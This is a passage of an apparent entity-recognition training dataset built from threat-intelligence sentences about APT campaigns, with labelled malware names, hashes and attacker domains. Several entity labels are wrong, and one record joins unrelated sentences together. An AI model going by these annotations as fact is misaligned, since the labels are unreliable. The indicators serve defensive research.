{}, "info": {"id": "aptner_train_003625", "source": "aptner_train"}} {"text": "Upload a specific file based on the full 
path name .", "spans": {}, "info": {"id": "aptner_train_003626", "source": "aptner_train"}} {"text": "Create a screenshot and uploads it on the C2 .", "spans": {"System: C2": [[42, 44]]}, "info": {"id": "aptner_train_003627", "source": "aptner_train"}} {"text": "Download a file from the Internet .", "spans": {}, "info": {"id": "aptner_train_003629", "source": "aptner_train"}} {"text": "Execute a command .", "spans": {}, "info": {"id": "aptner_train_003630", "source": "aptner_train"}} {"text": "When the attacker wants to gather information on the infected system (action 5) , it retrieves the following information: Hostname IP address Computer name Username name Connected drive OS version Architecture Start menu programs Installed software .", "spans": {}, "info": {"id": "aptner_train_003631", "source": "aptner_train"}} {"text": "The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.scr .", "spans": {"Malware: KONNI": [[35, 40]], "Indicator: RC_Office_Coordination_Associate.scr": [[105, 141]]}, "info": {"id": "aptner_train_003632", "source": "aptner_train"}} {"text": "This file drops exactly the same files than the previous campaign but the decoy document is different .", "spans": {}, "info": {"id": "aptner_train_003633", "source": "aptner_train"}} {"text": "This document contains the name , phone number and email address of members of agencies , embassies and organizations linked to North Korea .", "spans": {"System: email": [[51, 56]]}, "info": {"id": "aptner_train_003634", "source": "aptner_train"}} {"text": "The analysis shows us the evolution of KONNI over the last 3 years .", "spans": {"Malware: KONNI": [[39, 44]]}, "info": {"id": "aptner_train_003635", "source": "aptner_train"}} {"text": "The last campaign was started a few days ago and is still active .", "spans": {}, "info": {"id": "aptner_train_003636", "source": "aptner_train"}} {"text": "The infrastructure remains up and 
running at the time of this post .", "spans": {}, "info": {"id": "aptner_train_003637", "source": "aptner_train"}} {"text": "The RAT has remained under the Radar for multiple years .", "spans": {"System: Radar": [[31, 36]]}, "info": {"id": "aptner_train_003638", "source": "aptner_train"}} {"text": "An explanation could be the fact that the campaign was very limited nature , which does not arouse suspicion .", "spans": {}, "info": {"id": "aptner_train_003639", "source": "aptner_train"}} {"text": "This investigation shows that the author has evolved technically (by implementing new features) and in the quality of the decoy documents .", "spans": {}, "info": {"id": "aptner_train_003640", "source": "aptner_train"}} {"text": "The campaign of April 2017 used pertinent documents containing potentially sensitive data .", "spans": {}, "info": {"id": "aptner_train_003641", "source": "aptner_train"}} {"text": "Moreover the metadata of the Office document contains the names of people who seems to work for a public organization .", "spans": {"System: Office": [[29, 35]]}, "info": {"id": "aptner_train_003642", "source": "aptner_train"}} {"text": "We don't know if the document is a legitimate compromised document or a fake that the attacker has created in an effort to be credible .", "spans": {}, "info": {"id": "aptner_train_003643", "source": "aptner_train"}} {"text": "Clearly the author has a real interest in North Korea , with 3 of the 4 campaigns are linked to North Korea .", "spans": {}, "info": {"id": "aptner_train_003644", "source": "aptner_train"}} {"text": "Additional ways our customers can detect and block this threat are listed below .", "spans": {}, "info": {"id": "aptner_train_003645", "source": "aptner_train"}} {"text": "CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks .", "spans": {"System: CWS": [[0, 3]], "System: WSA": [[7, 10]]}, "info": {"id": "aptner_train_003647", "source": "aptner_train"}} {"text": "The 
Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors .", "spans": {"Organization: Network Security": [[4, 20]], "System: IPS": [[35, 38]], "System: NGFW": [[43, 47]]}, "info": {"id": "aptner_train_003649", "source": "aptner_train"}} {"text": "Umbrella , our secure internet gateway (SIG) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network .", "spans": {"Organization: Umbrella": [[0, 8]]}, "info": {"id": "aptner_train_003651", "source": "aptner_train"}} {"text": "SHA256 : 413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f .", "spans": {"Indicator: 413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f": [[9, 73]]}, "info": {"id": "aptner_train_003652", "source": "aptner_train"}} {"text": "Filename: beauty.scr .", "spans": {"Indicator: beauty.scr": [[10, 20]]}, "info": {"id": "aptner_train_003653", "source": "aptner_train"}} {"text": "SHA256 : eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435 .", "spans": {"Indicator: eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435": [[9, 73]]}, "info": {"id": "aptner_train_003654", "source": "aptner_train"}} {"text": "Filename: C:\\Windows\\beauty.jpg .", "spans": {"Indicator: C:\\Windows\\beauty.jpg": [[10, 31]]}, "info": {"id": "aptner_train_003655", "source": "aptner_train"}} {"text": "File type: JPEG image data , JFIF standard 1.02 .", "spans": {}, "info": {"id": "aptner_train_003656", "source": "aptner_train"}} {"text": "SHA256 : 44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9 .", "spans": {"Indicator: 44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9": [[9, 73]]}, "info": {"id": "aptner_train_003657", "source": "aptner_train"}} {"text": "Hilename: C:\\Windows\\svchost.exe .", "spans": {"Indicator: C:\\Windows\\svchost.exe": [[10, 32]]}, "info": {"id": "aptner_train_003658", "source": "aptner_train"}} 
{"text": "File type: PE32 executable (GUI) Intel 80386 , for MS Windows .", "spans": {"Organization: MS Windows": [[51, 61]]}, "info": {"id": "aptner_train_003659", "source": "aptner_train"}} {"text": "phpschboy.prohosts.org .", "spans": {"Indicator: phpschboy.prohosts.org": [[0, 22]]}, "info": {"id": "aptner_train_003660", "source": "aptner_train"}} {"text": "jams481.site.bz .", "spans": {"Indicator: jams481.site.bz": [[0, 15]]}, "info": {"id": "aptner_train_003661", "source": "aptner_train"}} {"text": "SHA256 : 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5 .", "spans": {"Indicator: 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5": [[9, 73]]}, "info": {"id": "aptner_train_003662", "source": "aptner_train"}} {"text": "Filename: How can North Korean hydrogen bomb wipe out Manhattan.scr .", "spans": {"Indicator: How can North Korean hydrogen bomb wipe out Manhattan.scr": [[10, 67]]}, "info": {"id": "aptner_train_003663", "source": "aptner_train"}} {"text": "SHA256 : 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634 .", "spans": {"Indicator: 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634": [[9, 73]]}, "info": {"id": "aptner_train_003664", "source": "aptner_train"}} {"text": "Filename: conhote.dll .", "spans": {"Indicator: conhote.dll": [[10, 21]]}, "info": {"id": "aptner_train_003665", "source": "aptner_train"}} {"text": "SHA256 : 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc .", "spans": {"Indicator: 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc": [[9, 73]]}, "info": {"id": "aptner_train_003666", "source": "aptner_train"}} {"text": "Filename: winnit.exe .", "spans": {"Indicator: winnit.exe": [[10, 20]]}, "info": {"id": "aptner_train_003667", "source": "aptner_train"}} {"text": "SHA256 : 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f .", "spans": {"Indicator: 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f": [[9, 73]]}, "info": 
{"id": "aptner_train_003668", "source": "aptner_train"}} {"text": "Filename: Anti virus service.lnk . dowhelsitjs.netau.net .", "spans": {"Indicator: Anti virus service.lnk": [[10, 32]], "Indicator: dowhelsitjs.netau.net": [[35, 56]]}, "info": {"id": "aptner_train_003669", "source": "aptner_train"}} {"text": "SHA256 : 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0 .", "spans": {"Indicator: 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0": [[9, 73]]}, "info": {"id": "aptner_train_003670", "source": "aptner_train"}} {"text": "Filename: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr .", "spans": {"Indicator: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr": [[10, 89]]}, "info": {"id": "aptner_train_003671", "source": "aptner_train"}} {"text": "SHA256 : 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b .", "spans": {"Indicator: 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b": [[9, 73]]}, "info": {"id": "aptner_train_003672", "source": "aptner_train"}} {"text": "Filename: adobe distillist.lnk .", "spans": {"Indicator: adobe distillist.lnk": [[10, 30]]}, "info": {"id": "aptner_train_003673", "source": "aptner_train"}} {"text": "SHA256 : 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635 .", "spans": {"Indicator: 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635": [[9, 73]]}, "info": {"id": "aptner_train_003674", "source": "aptner_train"}} {"text": "Filename: winload.exe .", "spans": {"Indicator: winload.exe": [[10, 21]]}, "info": {"id": "aptner_train_003675", "source": "aptner_train"}} {"text": "SHA256 : dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d .", "spans": {"Indicator: dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d": [[9, 73]]}, "info": {"id": "aptner_train_003676", "source": "aptner_train"}} {"text": "Filename: winload.dll .", "spans": {"Indicator: winload.dll": [[10, 
21]]}, "info": {"id": "aptner_train_003677", "source": "aptner_train"}} {"text": "Pactchfilepacks.net23.net . checkmail.phpnet.us .", "spans": {"Indicator: Pactchfilepacks.net23.net": [[0, 25]], "Indicator: checkmail.phpnet.us": [[28, 47]]}, "info": {"id": "aptner_train_003678", "source": "aptner_train"}} {"text": "Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"Indicator: Documents": [[0, 9]], "System: flash": [[19, 24]], "Vulnerability: exploit": [[25, 32], [94, 101]], "System: VirusTotal": [[105, 115]]}, "info": {"id": "aptner_train_003692", "source": "aptner_train"}} {"text": "Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts .", "spans": {"Organization: Leafminer": [[0, 9]]}, "info": {"id": "aptner_train_003754", "source": "aptner_train"}} {"text": "The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"Vulnerability: EternalBlue": [[4, 15]], "Vulnerability: exploits": [[16, 24]], "Malware: Petya": [[138, 143]], "Malware: NotPetya": [[146, 154]]}, "info": {"id": "aptner_train_003765", "source": "aptner_train"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"Indicator: documents": [[12, 21]], "Vulnerability: CVE-2017-0199": [[32, 45]]}, "info": {"id": "aptner_train_003786", "source": "aptner_train"}} {"text": "The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy .", "spans": {"Organization: Leviathan": [[4, 13]], "Organization: universities": [[86, 98]], "Organization: military": [[104, 112]], "Organization: Navy": [[156, 160]]}, "info": {"id": 
"aptner_train_003794", "source": "aptner_train"}} {"text": "FireEye is highlighting a Cyber Espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: actor": [[155, 160]], "Organization: APT40": [[169, 174]]}, "info": {"id": "aptner_train_003801", "source": "aptner_train"}} {"text": "We assess with moderate confidence that APT40 is a state-sponsored Chinese Cyber Espionage operation .", "spans": {"Organization: APT40": [[40, 45]]}, "info": {"id": "aptner_train_003806", "source": "aptner_train"}} {"text": "Depending on placement , a Web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement .", "spans": {"System: Web shell": [[27, 36]]}, "info": {"id": "aptner_train_003811", "source": "aptner_train"}} {"text": "On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Organization: actors": [[31, 37]], "Organization: individual": [[72, 82]]}, "info": {"id": "aptner_train_003829", "source": "aptner_train"}} {"text": "These emails included recruitment-themed lures and links to malicious HTML Application files .", "spans": {"System: emails": [[6, 12]], "System: HTML Application": [[70, 86]]}, "info": {"id": "aptner_train_003895", "source": "aptner_train"}} {"text": "APT34 often uses compromised accounts to conduct spear-phishing operations .", "spans": {"Organization: APT34": [[0, 5]], "Malware: compromised accounts": [[17, 37]]}, "info": {"id": "aptner_train_003898", "source": "aptner_train"}} {"text": "Magic Hound will often find simpler ACTs for effective compromise , such as creative phishing and simple custom malware .", "spans": {}, "info": {"id": "aptner_train_003953", "source": "aptner_train"}} {"text": "Attackers can point and click their ACT through a compromised 
network and exfiltrate data .", "spans": {"Organization: Attackers": [[0, 9]]}, "info": {"id": "aptner_train_003982", "source": "aptner_train"}} {"text": "The threat actor 's known working hours align to Chinese Standard TIME ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 .", "spans": {"Organization: actors": [[151, 157]], "Organization: APT10": [[228, 233]]}, "info": {"id": "aptner_train_004031", "source": "aptner_train"}} {"text": "Moafee and DragonOK both use a well-known proxy tool – HUC Packet Transmit MAL ( HTRAN ) – to disguise their geographical locations .", "spans": {"Organization: Moafee": [[0, 6]], "Organization: DragonOK": [[11, 19]], "Malware: HUC Packet Transmit MAL": [[55, 78]], "Malware: HTRAN": [[81, 86]]}, "info": {"id": "aptner_train_004036", "source": "aptner_train"}} {"text": "We believe APT34 is involved in a long-term Cyber Espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 .", "spans": {"Organization: APT34": [[11, 16]]}, "info": {"id": "aptner_train_004214", "source": "aptner_train"}} {"text": "APT34 uses a mix of public and non-public tools and often uses compromised accounts to conduct spear-phishing operations .", "spans": {"Organization: APT34": [[0, 5]]}, "info": {"id": "aptner_train_004261", "source": "aptner_train"}} {"text": "Russia .", "spans": {}, "info": {"id": "aptner_train_004319", "source": "aptner_train"}} {"text": "While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector .", "spans": {"Malware: custom dropper": [[35, 49]]}, "info": {"id": "aptner_train_004359", "source": "aptner_train"}} {"text": "While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday .", "spans": {"Malware: 
hacktools": [[54, 63]]}, "info": {"id": "aptner_train_004360", "source": "aptner_train"}} {"text": "Of note , this methodology of naming abstracts away the \" who \" element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": {"Organization: XENOTIME": [[74, 82]], "Organization: research institution": [[142, 162]]}, "info": {"id": "aptner_train_004424", "source": "aptner_train"}} {"text": "CTU researchers have evidence that the TG-3390 compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": {"Organization: CTU": [[0, 3]], "Organization: TG-3390": [[39, 46]], "Organization: manufacturing": [[114, 127]], "Organization: aerospace": [[143, 152]], "Organization: defense contractors": [[165, 184]], "Organization: automotive": [[189, 199]], "Organization: technology": [[202, 212]], "Organization: energy": [[215, 221]], "Organization: pharmaceuticals": [[228, 243]], "Organization: education": [[248, 257]], "Organization: legal": [[264, 269]]}, "info": {"id": "aptner_train_004431", "source": "aptner_train"}} {"text": "Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads .", "spans": {"Malware: Malware": [[0, 7]]}, "info": {"id": "aptner_train_004446", "source": "aptner_train"}} {"text": "In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims .", "spans": {"Malware: SWCs": [[21, 25]], "Organization: TG-3390": [[70, 77]], "System: emails": [[97, 103]]}, "info": {"id": 
"aptner_train_004448", "source": "aptner_train"}} {"text": "Using a U.S. based C2 infrastructure to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": {"System: C2": [[19, 21]], "Organization: TG-3390": [[77, 84]]}, "info": {"id": "aptner_train_004456", "source": "aptner_train"}} {"text": "CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) .", "spans": {"Organization: CTU": [[0, 3]]}, "info": {"id": "aptner_train_004460", "source": "aptner_train"}} {"text": "TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL .", "spans": {"Organization: TG-3390": [[0, 7]], "System: DLL": [[141, 144]]}, "info": {"id": "aptner_train_004467", "source": "aptner_train"}} {"text": "They then identify the Exchange server and attempt to install the OwaAuth web shell .", "spans": {"Malware: OwaAuth web shell": [[66, 83]]}, "info": {"id": "aptner_train_004475", "source": "aptner_train"}} {"text": "Emissary Panda has used many ACTs with the most notable being the exploits from the Hacking Team leak .", "spans": {}, "info": {"id": "aptner_train_004518", "source": "aptner_train"}} {"text": "Taiwan has been a regular target of Cyber Espionage threat actors for a number of years .", "spans": {}, "info": {"id": "aptner_train_004574", "source": "aptner_train"}} {"text": "The China-backed Barium APT is suspected to be at the helm of the project .", "spans": {"Organization: Barium": [[17, 23]]}, "info": {"id": "aptner_train_004769", "source": "aptner_train"}} {"text": "targeted attacks .", "spans": {}, "info": {"id": "aptner_train_004842", "source": "aptner_train"}} {"text": "The developers of Bookworm use these modules in a rather unique ACT , as the other embedded DLLs provide API functions for Leader to carry out its tasks .", "spans": 
{"Malware: Bookworm": [[18, 26]], "Malware: Leader": [[123, 129]]}, "info": {"id": "aptner_train_004851", "source": "aptner_train"}} {"text": "We believe that the IP addresses from Canada , Russia and Norway are analysis systems of antivirus companies or security researchers .", "spans": {"Organization: antivirus companies": [[89, 108]]}, "info": {"id": "aptner_train_004870", "source": "aptner_train"}} {"text": "They have different functions and ways of spreading , but the same purpose — to steal money from the accounts of businesses .", "spans": {"Organization: businesses": [[113, 123]]}, "info": {"id": "aptner_train_004895", "source": "aptner_train"}} {"text": "Periodically , the malware tries to contact the command-and-control ( C&C ) server with the username encoded into parameters .", "spans": {"System: command-and-control": [[48, 67]], "System: C&C": [[70, 73]]}, "info": {"id": "aptner_train_004952", "source": "aptner_train"}} {"text": "Patchwork uses email as an entry point , which is why securing the email gateway is important .", "spans": {"Organization: Patchwork": [[0, 9]]}, "info": {"id": "aptner_train_004959", "source": "aptner_train"}} {"text": "Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text .", "spans": {"Organization: Talos": [[0, 5]], "Indicator: webmail.finance.gov.lb": [[140, 162]], "System: email": [[213, 218]], "System: VPN": [[223, 226]]}, "info": {"id": "aptner_train_005023", "source": "aptner_train"}} {"text": "Kessem .", "spans": {"Organization: Kessem": [[0, 6]]}, "info": {"id": "aptner_train_005068", "source": "aptner_train"}} {"text": "attacks using this tool were still active as of April 2016 .", "spans": {}, "info": {"id": "aptner_train_005103", "source": "aptner_train"}} {"text": "Initial intrusion stages feature the 
Win32/Barlaiy implant—notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": {"Malware: Win32/Barlaiy": [[37, 50]], "System: C&C": [[161, 164]]}, "info": {"id": "aptner_train_005156", "source": "aptner_train"}} {"text": "LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"Organization: Barium": [[9, 15]], "Organization: SOC personnel": [[86, 99]]}, "info": {"id": "aptner_train_005166", "source": "aptner_train"}} {"text": "Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file .", "spans": {"Malware: Lurk": [[0, 4]]}, "info": {"id": "aptner_train_005183", "source": "aptner_train"}} {"text": "\" With our latest research we now see how Greenbug has shifted away from HTTP-based C2 communication with Ismdoor .", "spans": {"System: C2": [[84, 86]], "Malware: Ismdoor": [[106, 113]]}, "info": {"id": "aptner_train_005242", "source": "aptner_train"}} {"text": "com to establish free subdomains in their infrastructure .", "spans": {}, "info": {"id": "aptner_train_005267", "source": "aptner_train"}} {"text": "In the second set they are making use of a dynamic DNS service by ChangeIP .", "spans": {"Malware: dynamic DNS service": [[43, 62]]}, "info": {"id": "aptner_train_005275", "source": "aptner_train"}} {"text": "com .", "spans": {}, "info": {"id": "aptner_train_005276", "source": "aptner_train"}} {"text": "Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"Indicator: attachment": [[35, 45]], "Malware: Trojan": [[63, 69]], "Malware: NetTraveler": [[79, 90]], "Indicator: DLL side-loading": [[99, 115]]}, "info": {"id": "aptner_train_005356", "source": 
"aptner_train"}} {"text": "attacks on the chemical industry are merely their latest attack wave .", "spans": {"Organization: chemical industry": [[15, 32]]}, "info": {"id": "aptner_train_005374", "source": "aptner_train"}} {"text": "Like BlackEnergy ( a.k.a. Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus .", "spans": {"Malware: BlackEnergy": [[5, 16]], "Organization: Sandworm": [[26, 34]], "Organization: Quedagh": [[37, 44]], "Malware: Potao": [[49, 54]]}, "info": {"id": "aptner_train_005404", "source": "aptner_train"}} {"text": "The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": {"Organization: ScarCruft": [[4, 13]]}, "info": {"id": "aptner_train_005456", "source": "aptner_train"}} {"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": {"Vulnerability: zero-day": [[39, 47]], "System: Adobe Flash Player": [[48, 66]]}, "info": {"id": "aptner_train_005464", "source": "aptner_train"}} {"text": "attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks .", "spans": {"System: emails": [[34, 40]], "Vulnerability: exploit": [[85, 92]], "Organization: ScarCruft": [[113, 122]]}, "info": {"id": "aptner_train_005474", "source": "aptner_train"}} {"text": "Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": {"System: flash": [[65, 70]], "Vulnerability: exploit": [[71, 78]], "Vulnerability: CVE-2016-4117": [[81, 94]]}, "info": {"id": "aptner_train_005475", "source": "aptner_train"}} {"text": "Silence try to apply new techniques and 
ways of stealing from various banking systems , including AWS CBR , ATMs , and card processing .", "spans": {}, "info": {"id": "aptner_train_005494", "source": "aptner_train"}} {"text": "The spear-phishing infection vector is still the most popular way to initiate targeted campaigns .", "spans": {}, "info": {"id": "aptner_train_005506", "source": "aptner_train"}} {"text": "The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools EternalRomance and EternalSynergy that were also released as part of the Shadow Brokers leak .", "spans": {"System: Windows": [[11, 18]], "Vulnerability: CVE-2017-0143": [[35, 48]], "Vulnerability: exploit": [[126, 133]], "Vulnerability: EternalRomance": [[140, 154]], "Vulnerability: EternalSynergy": [[159, 173]], "Organization: Shadow Brokers": [[213, 227]]}, "info": {"id": "aptner_train_005555", "source": "aptner_train"}} {"text": "RedDrip Team (formerly SkyEye Team ) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus . COCCOC is a Vietnam was founded in 2013 . In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . these threat actors targeted a number of government agencies threat actors targeted a number of government agencies in East Asia . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. 
Maudi Surveillance Operation which was previously reported in 2013 . specifically CVE-2018-0798 , before downloading subsequent payloads . The dropped PE file has the distinctive file name 8.t” . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . These conflicts have even resulted in Haftar leading an attack on the capital city in April . The attackers have targeted a large number of organizations globally since early 2017 . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . The attackers have taken great care to stay under the radar , imitating another attack group in the region . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . The malware starts communicating with the C&C server by sending basic information about the infected machine . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . 
What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal . We refer to this campaign and the associated actor as Operation Kingphish Malik” , in one of its written forms in Arabic , translates to King” . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers’ rights in Qatar . It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . In the course of this email correspondence , the attacker — Safeena” — then sent what appeared to be invitations to access several documents on Google Drive . The attackers were meticulous in making their phishing page as credible as possible . 
Among the targets of this campaign is the International Trade Union Confederation .", "spans": {"Organization: RedDrip Team": [[0, 12]], "Organization: SkyEye Team": [[23, 34]], "Organization: OceanLotus": [[49, 59], [331, 341], [447, 457]], "Organization: RedDrip": [[203, 210]], "Organization: COCCOC": [[344, 350]], "Organization: media": [[585, 590]], "Organization: real estate companies": [[593, 614]], "Organization: foreign enterprises": [[617, 636]], "Organization: banks": [[641, 646]], "Organization: Ratsnif": [[677, 684]], "Organization: actors": [[794, 800], [2379, 2385]], "Organization: government": [[822, 832]], "Organization: agencies": [[833, 841]], "Organization: Attackers": [[857, 866], [1512, 1521]], "Organization: Microsoft": [[877, 886]], "Vulnerability: exploit": [[903, 910]], "Vulnerability: CVE-2018-0798": [[911, 924], [1085, 1098]], "Organization: Maudi": [[1003, 1008]], "Malware: PE": [[1154, 1156]], "Indicator: 8.t”": [[1192, 1196]], "Organization: Cotx RAT": [[1263, 1271]], "Organization: Symantec": [[1300, 1308]], "Organization: Haftar": [[1368, 1374]], "Organization: attackers": [[1428, 1437], [2205, 2214], [2837, 2846], [3764, 3773], [4123, 4132]], "Organization: political": [[1600, 1609]], "Organization: Group's": [[1639, 1646]], "Organization: parliaments": [[1693, 1704]], "Organization: senates": [[1707, 1714]], "Organization: top state offices": [[1717, 1734]], "Organization: officials": [[1739, 1748]], "Organization: political science scholars": [[1751, 1777]], "Organization: military": [[1780, 1788]], "Organization: intelligence agencies": [[1793, 1814]], "Organization: ministries": [[1817, 1827]], "Organization: media outlets": [[1830, 1843]], "Organization: research centers": [[1846, 1862]], "Organization: election commissions": [[1865, 1885]], "Organization: Olympic organizations": [[1888, 1909]], "Organization: trading companies": [[1918, 1935]], "Organization: unknown entities": [[1948, 1964]], "Organization: Cisco Talos": 
[[1967, 1978]], "Organization: Operation Parliament": [[2099, 2119]], "Indicator: malware": [[2522, 2529], [2658, 2665], [2769, 2776]], "System: C&C": [[2696, 2699]], "Malware: CMD/PowerShell": [[2805, 2819]], "Organization: Operation Kingphish": [[3309, 3328]], "Organization: Voiceless": [[3600, 3609]], "System: email": [[3982, 3987]], "Organization: attacker": [[4009, 4017]], "Organization: Trade Union Confederation": [[4261, 4286]]}, "info": {"id": "aptner_train_005562", "source": "aptner_train"}} {"text": "The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": {"System: PowerShell": [[4, 14]], "Malware: Trojan": [[30, 36]]}, "info": {"id": "aptner_train_005568", "source": "aptner_train"}} {"text": "The Trojan is quite similar to the .NET RocketMan Trojan Obviously and can handle the same commands; additionally , it includes the #screen” command to take a screenshot .", "spans": {"Malware: Trojan": [[4, 10], [50, 56]], "System: .NET": [[35, 39]], "Malware: RocketMan": [[40, 49]]}, "info": {"id": "aptner_train_005569", "source": "aptner_train"}} {"text": "Winnti mode of operation to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . Hackers usually take precautions , which experts refer to as Opsec .", "spans": {"Organization: Winnti": [[0, 6]], "Organization: charts of companies": [[70, 89]], "Organization: individual business units": [[142, 167]], "Organization: Hackers": [[205, 212]]}, "info": {"id": "aptner_train_005571", "source": "aptner_train"}} {"text": "The Winnti group’s Opsec was dismal to say the least . 
